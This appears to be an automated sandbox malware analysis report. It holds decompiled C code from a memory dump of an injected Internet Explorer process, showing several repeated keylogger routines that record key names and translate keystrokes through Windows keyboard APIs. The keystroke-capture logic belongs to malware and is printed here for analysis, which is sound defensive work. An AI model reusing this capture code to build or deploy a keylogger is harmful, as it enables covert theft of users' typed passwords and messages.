Part of subcall function 00C81CD8: 75CF465A.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C77
Part of subcall function 00C81CD8: 75CF4513.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: 75CF4513.OLEAUT32(?,00C8E07C,?,00C8452C,00C84541,00000000,00000001,00000000,00000351,00000000,00000000,?,00C8A5BE,00000000,00000000,00000000), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
[Left Alt], xrefs: 00C85CAF
KeyDelBackspace, xrefs: 00C85E2A

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C85C25, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85C25(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[F9]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: 75CF4513.OLEAUT32(00C89A90,00C89B88,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81B86
Part of subcall function 00C81BB4: 75CF7790.OLEAUT32(00C89B88,00C89A90,00000014,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: 75CF465A.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C77
Part of subcall function 00C81CD8: 75CF4513.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: 75CF4513.OLEAUT32(?,00C8E07C,?,00C8452C,00C84541,00000000,00000001,00000000,00000351,00000000,00000000,?,00C8A5BE,00000000,00000000,00000000), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A
[F9], xrefs: 00C85C27

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C85DAE, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85DAE(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[Print Screen]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: 75CF4513.OLEAUT32(00C89A90,00C89B88,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81B86
Part of subcall function 00C81BB4: 75CF7790.OLEAUT32(00C89B88,00C89A90,00000014,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: 75CF465A.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C77
Part of subcall function 00C81CD8: 75CF4513.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: 75CF4513.OLEAUT32(?,00C8E07C,?,00C8452C,00C84541,00000000,00000001,00000000,00000351,00000000,00000000,?,00C8A5BE,00000000,00000000,00000000), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
[Print Screen], xrefs: 00C85DB0
KeyDelBackspace, xrefs: 00C85E2A

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C8595B, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C8595B(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[Back Tab]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: 75CF4513.OLEAUT32(00C89A90,00C89B88,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81B86
Part of subcall function 00C81BB4: 75CF7790.OLEAUT32(00C89B88,00C89A90,00000014,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: 75CF465A.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C77
Part of subcall function 00C81CD8: 75CF4513.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: 75CF4513.OLEAUT32(?,00C8E07C,?,00C8452C,00C84541,00000000,00000001,00000000,00000351,00000000,00000000,?,00C8A5BE,00000000,00000000,00000000), ref: 00C81BA3

Strings

[Back Tab], xrefs: 00C8595D
Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C85DBC, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85DBC(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[Arrow Up]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: 75CF4513.OLEAUT32(00C89A90,00C89B88,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81B86
Part of subcall function 00C81BB4: 75CF7790.OLEAUT32(00C89B88,00C89A90,00000014,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: 75CF465A.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C77
Part of subcall function 00C81CD8: 75CF4513.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: 75CF4513.OLEAUT32(?,00C8E07C,?,00C8452C,00C84541,00000000,00000001,00000000,00000351,00000000,00000000,?,00C8A5BE,00000000,00000000,00000000), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
[Arrow Up], xrefs: 00C85DBE
KeyDelBackspace, xrefs: 00C85E2A

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C85DD8, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85DD8(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[Volume Mute]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: 75CF4513.OLEAUT32(00C89A90,00C89B88,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81B86
Part of subcall function 00C81BB4: 75CF7790.OLEAUT32(00C89B88,00C89A90,00000014,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: 75CF465A.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C77
Part of subcall function 00C81CD8: 75CF4513.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: 75CF4513.OLEAUT32(?,00C8E07C,?,00C8452C,00C84541,00000000,00000001,00000000,00000351,00000000,00000000,?,00C8A5BE,00000000,00000000,00000000), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A
[Volume Mute], xrefs: 00C85DDA

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C85DCA, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85DCA(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[Volume Down]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: 75CF4513.OLEAUT32(00C89A90,00C89B88,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81B86
Part of subcall function 00C81BB4: 75CF7790.OLEAUT32(00C89B88,00C89A90,00000014,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: 75CF465A.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C77
